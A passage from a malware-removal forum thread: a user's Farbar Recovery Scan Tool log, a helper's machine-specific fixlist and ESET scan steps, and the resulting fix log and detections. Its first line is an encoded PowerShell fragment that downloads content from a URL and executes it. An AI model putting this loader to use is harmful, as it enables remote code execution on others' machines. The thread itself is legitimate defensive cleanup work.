AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {979D3DBD-25E6-45A0-94F9-9C65718D37D3} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe
Task: {9D3995D8-EDC8-49DE-A458-88F17D3EA586} - System32\Tasks\PornTime => C:\Program Files (x86)\PornTime\pt.exe
Task: {A564F7B1-A5A8-4A4D-A4BD-EDA62AD2FADE} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {AB055F26-183D-4829-AE93-8E290BD1CBCA} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\WSCStub.exe
Task: {B3E7FCC8-AD9C-44DD-952D-229AA7603D16} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {B415E821-0F31-4DAD-B46B-855A3C2042D9} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {D7B89F05-CDAE-4B5F-AB09-B7A9BBDDE804} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {DBAA2EE1-0D9E-42A6-A5D1-2464AAE7B572} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-07-16 10:06 - 2014-07-16 10:06 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2012-10-25 07:45 - 2012-10-25 07:45 - 00034304 _____ () C:\Windows\System32\sdo1ml6.dll
2014-05-20 19:33 - 2015-01-10 00:29 - 00117392 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-05-20 19:28 - 2015-01-10 09:07 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2015-12-25 23:21 - 2015-12-25 23:21 - 17647296 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup
MSCONFIG\startupreg: Andy => C:\Program Files\Andy\HandyAndy.exe
MSCONFIG\startupreg: Box Edit => C:\Users\Simon\AppData\Local\Box\Box Edit\Box Edit.exe
MSCONFIG\startupreg: Box Local Com Server => C:\ProgramData\Box\ComServer\Box Local Com Service.exe
MSCONFIG\startupreg: BrowserChoice => "C:\Windows\System32\browserchoice.exe" /run
MSCONFIG\startupreg: Gyazo => C:\Program Files (x86)\Gyazo\GyStation.exe
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Spotify => "C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Simon\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SteelSeries Engine => C:\Program Files\SteelSeries\SteelSeries Engine\SteelSeriesEngine.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Unified Remote v2 => C:\Users\Simon\Desktop\Ny mappe\RemoteServer.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{AB2FEE24-8032-4E9E-92DA-64BB088FC41E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{F106D850-6184-4BD8-BEB3-45242004BC35}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{4E1B0C1D-5364-4F99-BD4A-ECCE74031C0A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{CB0C4F41-C187-4A1D-85F9-A69FF8D5CFEC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{13CAF80E-3321-4614-9CE3-74F2162BE597}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{31EDFDEA-FAEA-43B6-9F03-FE691930B95F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{A75C6E01-BECE-4F00-AA03-723A57B19147}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{98D1DBBE-BEA5-433E-9CA6-0B1714ACD936}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B23CBBCF-50A7-478B-809F-83E2FDF83FD1}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E4C6D351-DAD8-4220-BC6C-DE73EEA7C6DB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{270EABF0-B2D9-4597-B0A7-F75061F48CA0}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [TCP Query User{BC3E98B8-D846-4D9F-8D92-6A5BA3495D70}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{66E7805C-67FB-47F1-A39F-0C47A01EE572}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{4792FD49-5934-42CF-AAD3-73DEA7C5F851}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{409438CE-1684-45DD-95EA-6864DB5687E7}] => (Allow) LPort=2869
FirewallRules: [{2A1A026D-FFE9-4073-9BA4-45010D1B2086}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{2C940A19-ACA9-41D0-B0E6-8F10E1832352}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{099A47F4-D1F0-4242-A024-AC85A7DA0C05}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{4046ED15-B5DC-44FE-AF82-CC6544125AB4}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{61F78399-B7D2-4F40-8272-FA2FE8A5D8A8}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [{7C2A5245-8A80-4ACE-82CF-10DE7EAC0228}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{F35C17EE-A6B7-4485-A687-C311E3392A94}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{98406585-EE39-4584-BD3F-F1BF414A0CC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5554D9CC-7BD0-453A-AC47-BD705640C175}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{AD7C4BAF-9C55-4CE0-A596-801278A9614F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{A5B089B6-F6E2-4203-ABFD-A28E27B8B359}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6BEFAD78-3D5C-4F18-9538-5A4C7CC3E0E9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0171AADA-49AA-4CDA-98B9-B7F5F5A75E44}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FFE9D83D-7E4B-401D-84A3-5A947D59C412}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{086EA29B-9325-4BDB-B314-5EE46E605002}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{FF876EF3-52B9-4C91-9477-27F3E6247D4E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{F2BBEFF5-FBA0-4432-B006-BE4E6540F707}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{68543947-F16B-448E-9BE6-88FB44857456}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [{65714679-8478-4C66-92EF-1A3A0C03545C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{98C0C0B1-31F6-41CF-9811-E3C54F0E8270}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{5EABEC4E-1B3F-493C-B50D-42F2D2BCB79C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{2825A6B2-A9EA-4B3D-81D2-6E7A4E146574}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [TCP Query User{0D481072-C761-4FB2-89F0-45AF6B6C9C3D}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{6C5190FB-1903-4387-9DE6-9A16CB3879CE}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{EA980882-35BE-47B4-A19B-2FD475CA6AB1}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [UDP Query User{1850CB56-D20F-4122-B53B-54A493C90733}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{E7C2471B-B7D0-48B6-95F1-9797E71B957E}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{ECB90B53-400F-4524-8D1B-261DDE021B0F}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{1A445CA6-6818-4425-9939-793C713D4CD8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{11EF1017-59B8-44AA-8733-6441A42883A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{FB3936F5-A285-43E9-8E89-73B271B60BFE}] => (Allow) LPort=5556
FirewallRules: [{CF260196-7A31-4F17-BD1A-4A124C939586}] => (Allow) LPort=5558
FirewallRules: [{42715D29-0E28-4043-949D-57D4E66AC21F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6D63373F-B12C-4589-8D9E-5EED49E92CBA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{FAF73EE2-2C47-421B-829B-2B7CA0BEABD9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E463B906-D4E7-4F07-BDCD-45B6B4A8CBF1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{07335363-4A29-4B87-B8BA-897571D157C3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{58C9069B-3C00-44AD-924E-4366110F65CB}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{FBB2681F-4FF7-4AC6-B5DD-7D541FFB0DF2}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [{2E9338DD-C557-4FCD-8ABF-081E0E5CE611}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

11-01-2015 23:29:09 Installed Box Edit
17-01-2015 13:52:54 Windows Update
18-01-2015 01:52:06 Windows Update
22-01-2015 20:56:02 Windows Update
28-01-2015 23:19:10 Windows Update
09-02-2015 19:51:33 Windows Update
10-02-2015 15:08:07 Windows Defender Checkpoint
20-03-2015 07:36:02 Windows Update
13-04-2015 22:25:56 Installasjonsprogram for Windows-moduler
13-04-2015 22:28:58 Installasjonsprogram for Windows-moduler
13-04-2015 22:43:24 Windows Update
14-04-2015 01:59:55 Removed Bonjour
14-04-2015 02:00:17 Windows Update
14-04-2015 07:35:42 Installed DirectX
16-04-2015 17:05:09 Windows Defender Checkpoint
17-04-2015 06:28:06 Windows Update
21-04-2015 15:23:14 Windows Update
25-04-2015 01:10:40 Windows Update
28-04-2015 22:13:02 Windows Update
04-05-2015 13:57:55 Windows Update
05-05-2015 13:38:54 Windows Defender Checkpoint
16-05-2015 02:50:08 Windows Update
17-05-2015 00:35:34 Installed DirectX
17-05-2015 01:48:39 Windows Update
20-05-2015 22:17:42 Windows Update
26-05-2015 13:34:14 Windows Update
02-06-2015 10:22:40 Windows Update
05-06-2015 10:26:15 Windows Update
09-06-2015 06:44:26 Windows Update
10-06-2015 22:10:45 Windows Update
13-06-2015 23:49:57 Installed DirectX
16-06-2015 18:07:50 Windows Update
18-06-2015 02:30:18 Windows Defender Checkpoint
23-06-2015 17:49:41 Windows Update
28-06-2015 17:18:39 Windows Update
03-07-2015 11:52:32 Windows Update
07-07-2015 09:04:10 Windows Update
16-07-2015 12:42:09 Windows Update
26-07-2015 02:02:33 Installasjonsprogram for Windows-moduler
26-07-2015 23:37:24 Windows Update
27-07-2015 01:05:15 Windows Update
30-07-2015 03:27:55 Windows Update
30-07-2015 03:55:25 Windows Update
03-08-2015 19:26:35 Windows Update
11-08-2015 13:24:46 Windows Update
10-10-2015 01:42:20 Windows Update
10-10-2015 01:55:52 Windows Update
11-10-2015 02:53:39 Windows Update
27-10-2015 01:21:50 Installasjonsprogram for Windows-moduler
01-11-2015 02:14:41 Windows Update
01-11-2015 03:02:02 Windows Update
13-11-2015 19:14:13 Windows Update
17-11-2015 01:18:30 Windows Update
07-12-2015 03:25:33 Windows Update
07-12-2015 05:05:11 Windows Update
23-12-2015 02:12:31 Windows Update
23-12-2015 03:00:11 Windows Update
25-12-2015 21:52:17 JRT Pre-Junkware Removal
25-12-2015 21:52:35 ComboFix created restore point
25-12-2015 22:14:12 JRT Pre-Junkware Removal
26-12-2015 02:09:09 Installed Sound Blaster Cinema
26-12-2015 03:00:48 Windows Update
26-12-2015 15:33:54 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (12/26/2015 02:03:18 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD initialization failed [6]

Error: (12/26/2015 02:03:18 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0]

Error: (12/26/2015 02:03:18 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD endpoint registration failed [0]

Error: (12/26/2015 02:40:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: steamwebhelper.exe, versjon: 3.17.73.86, tidsangivelse: 0x566f1544
Modulnavn med feil: libcef.dll, versjon: 3.2526.1348.0, tidsangivelse: 0x5643e1a9
Unntakskode: 0xc0000005
Feilforskyvning: 0x00e2f176
Feil prosess-ID: 0x15cc
Feil starttid for program: 0xsteamwebhelper.exe0
Feil programbane: steamwebhelper.exe1
Feil modulbane: steamwebhelper.exe2
Rapport-ID: steamwebhelper.exe3

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD initialization failed [6]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcFailed to set NvVAD endpoint as default Audio endpoint [0]

Error: (12/25/2015 10:10:50 PM) (Source: NvStreamSvc) (EventID: 2001) (User: )
Description: NvStreamSvcNvVAD endpoint registration failed [0]

Error: (12/25/2015 09:49:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet AdwCleaner.exe versjon 5.0.2.6 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: b64

Starttidspunkt: 01d13f556d372a67

Avslutningstidspunkt: 2

Programbane: C:\Users\Simon\Desktop\Malware\AdwCleaner.exe

Rapport-ID: f3f89292-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:49:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programmet mbam.exe versjon 2.3.125.0 sluttet å samhandle med Windows og ble lukket. Hvis du vil se om det finnes mer informasjon tilgjengelig om problemet, ser du i problemloggen i kontrollpanelet for Handlingssenter.

Prosess-ID: 1754

Starttidspunkt: 01d13f559e1de315

Avslutningstidspunkt: 10

Programbane: C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

Rapport-ID: f14612a6-ab48-11e5-94ca-a088696cbf14

Error: (12/25/2015 09:14:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Programnavn med feil: mbam.exe, versjon: 1.0.0.532, tidsangivelse: 0x53518532
Modulnavn med feil: MSVCR100.dll, versjon: 10.0.40219.325, tidsangivelse: 0x4df2be1e
Unntakskode: 0x40000015
Feilforskyvning: 0x0008d6fd
Feil prosess-ID: 0x180c
Feil starttid for program: 0xmbam.exe0
Feil programbane: mbam.exe1
Feil modulbane: mbam.exe2
Rapport-ID: mbam.exe3


System errors:
=============
Error: (12/26/2015 03:34:08 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Tjenesten NVIDIA Streamer Service avsluttet uventet. Det har den gjort 1 gang(er).

Error: (12/26/2015 03:34:07 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Tjenesten NVIDIA Display Driver Service avsluttet uventet. Det har den gjort 1 gang(er).

Error: (12/26/2015 02:02:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Det oppstod et tidsavbrudd (30000 millisekunder) under venting på at tjenesten NVIDIA Network Service skal koble til.

Error: (12/26/2015 02:02:42 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/26/2015 02:19:52 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Tjenesten Intel(R) PROSet/Wireless Zero Configuration Service kan ikke starte på grunn av følgende feil: 
%%1053

Error: (12/26/2015 02:19:51 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Det oppstod et tidsavbrudd (30000 millisekunder) under venting på at tjenesten Intel(R) PROSet/Wireless Zero Configuration Service skal koble til.

Error: (12/26/2015 02:18:23 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/26/2015 02:16:12 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.

Error: (12/26/2015 02:15:47 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (12/26/2015 02:14:40 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-MYNDIGHET)
Description: Det oppstod en feil under forsøk på lese den lokale vertsfilen.


CodeIntegrity:
===================================
  Date: 2015-12-25 22:00:26.834
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2015-12-25 22:00:26.787
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info =========================== 

Processor: Intel(R) Core(TM) i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 30%
Total physical RAM: 8112.24 MB
Available physical RAM: 5601.91 MB
Total Virtual: 16222.69 MB
Available Virtual: 13638.52 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:921.52 GB) (Free:353.12 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DriverCD) (Fixed) (Total:10 GB) (Free:5.19 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8BE4CCEC)
Partition 1: (Active) - (Size=921.5 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

There you go, most of the scans resulted in no hits whatsoever. But im possitive the adware is still somewhere, because every time i click a text box, link or regular text that shouldnt be links, i get redirected to these sites... Thanks for helping!



#4 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,114 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:14 PM

Posted 27 December 2015 - 07:51 AM

Hey,

 

Please uninstall Chrome for now and install it again when we are finished with the removal process. Chrome has been modified.

 

Running from C:\Users\Simon\Downloads

Please move FRST to your Desktop.

 

 

STEP 1

xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    CreateRestorePoint:
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No FileCHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    Hosts:
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]EmptyTemp:
    end
  • Click FileSave As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.

STEP 2
GzlsbnV.png ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click esetListThreats.png. If no threats were found, skip the next two bullet points. 
  • Click esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to KN1w2nv.png and click SzOC1p0.png.
  • Re-enable your anti-virus software.
  • Copy the contents of the log and paste in your next reply.
     

======================================================
 
STEP 3
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

 

  • fixlog.txt
  • ESET Online Scan log

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#5 swaykeb00b

swaykeb00b
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 27 December 2015 - 11:45 AM

Heres the fixlog:

Fix result of Farbar Recovery Scan Tool (x64) Version:25-12-2015
Ran by Simon (2015-12-27 15:12:19) Run:1
Running from C:\Users\Simon\Downloads
Loaded Profiles: Simon (Available Profiles: Simon)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CreateRestorePoint:
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No FileCHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Hosts:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]EmptyTemp:
end
*****************

Restore point was successfully created.
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
Hosts restored successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
"HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect" => key removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully

==== End of Fixlog 15:12:57 ====

and heres the eset log:

C:\Users\Simon\AppData\LocalLow\Sun\Java\jre1.7.0_67\java_sp.dll	a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Users\Simon\Desktop\showbox.apk	a variant of Android/AdDisplay.RevMob.A potentially unwanted application
C:\Users\Simon\Desktop\root\files\libexploit.so	a variant of Android/Exploit.Towel.A trojan
C:\Windows\Installer\MSIE74.tmp	a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
